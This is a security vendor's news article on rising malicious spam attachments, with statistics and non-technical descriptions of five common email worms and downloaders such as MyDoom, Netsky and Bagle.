Spam with Malicious Attachments Rising

While the volume of spam messages is falling, the number of messages containing malicious attachments increased, meaning that spam is growing more dangerous even as it becomes less prevalent , according to a Bitdefender study.

The number of malicious attachments in January of this year rose 4 percent from the same period of last year, even as the overall number of spam messages sent dropped by more than 16 percent in the first quarter of 2012 from the last quarter of 2011, Bitdefender research shows. Of the 264.6 billion spam messages sent daily, 1.14% carry attachments – about 300 million of which are malicious.

After increasing in January, the growth of malicious attachments leveled off amid an apparent pause in spam campaigns even though spam continued to fall overall. Attachments may come in the form of phishing forms that trick users into typing in credit card credentials for scammers to use whenever they want. Or they may pack malware such as Trojans, worms and viruses that can eventually cause trouble to innocent users.

As this type of attachment has become a growing concern around the web, Bitdefender wanted to see what exact pieces of malware end up in users` inboxes. Here are top five most interesting and frequent malware samples attached to spam e-mails:

First discovered in 2008 – MyDoom – a mass mailing worm continues to be among the most persistent pieces of malware to pierce users’ inboxes. After the skillfully social engineered e-mails convince the user to open the attachment, the worm sends itself to all e-mail addresses found on that system using a variety of senders, subject tags and body text samples.

MyDoom also drops a backdoor component on the system-host to grant a remote attacker full access to the user’s computer. It also updates a list of infected IP addresses on a remote server,. This way, every compromised system is listed into a common database of infected computers accessible to the worm. MyDoom is known to be used in denial-of-service attacks against antivirus and software producing companies’ sites.

The second most widely spread malicious attachment is a generic Javascript downloader that comes in the form of an obfuscated JS inside the HTML attachment. When the user opens the attached HTML file, the obfuscated Javascript executes itself and injects an iFrame in the same HTML page it resides in. This iFrame loads malicious contents from third-party servers, which results in system compromise.

Ranking third is Netsky – a mass mailer like MyDoom that, apart from sending itself to all e-mail addresses found on the compromised system, also spreads via FTP, P2P or shared files. The crafty subject tags range from accusations and error messages to love declarations or money transactions, and include celebrity names to make them more appealing to the victim. If the user opens the attachment, the worm displays a message (made to look as though coming from the locally installed AV solution) saying that no virus is found on the system. Another peculiarity is that Netsky never sends itself to e-mail addresses containing words related to security and antivirus industry (@antivirus, @FBI, @freeav, bitdefender etc).

In fourth place is Mytob – a worm known to prevent users from connecting to a multitude of security solutions vendors’ sites while opening a backdoor to allow access to ill-intentioned remote intruders. This way the system is open to any sort of malicious exploitation.

The Bagle worm comes in fifth, as a mass mailer gathering addresses and sending itself to all e-mail addresses it stumbles upon on the compromised system. It also downloads further addresses from an embedded list of online locations. To pass undetected it terminates processes mostly related to locally installed anti-virus solutions. It then downloads and executes files from numerous dubious websites.

This article is based on the technical information provided courtesy of Doina Cosovan, Bitdefender Virus Analyst and Bitdefender Anti-Spam Lab.

All product and company names mentioned herein are for identification purposes only and are the property of, and may be trademarks of, their respective owners.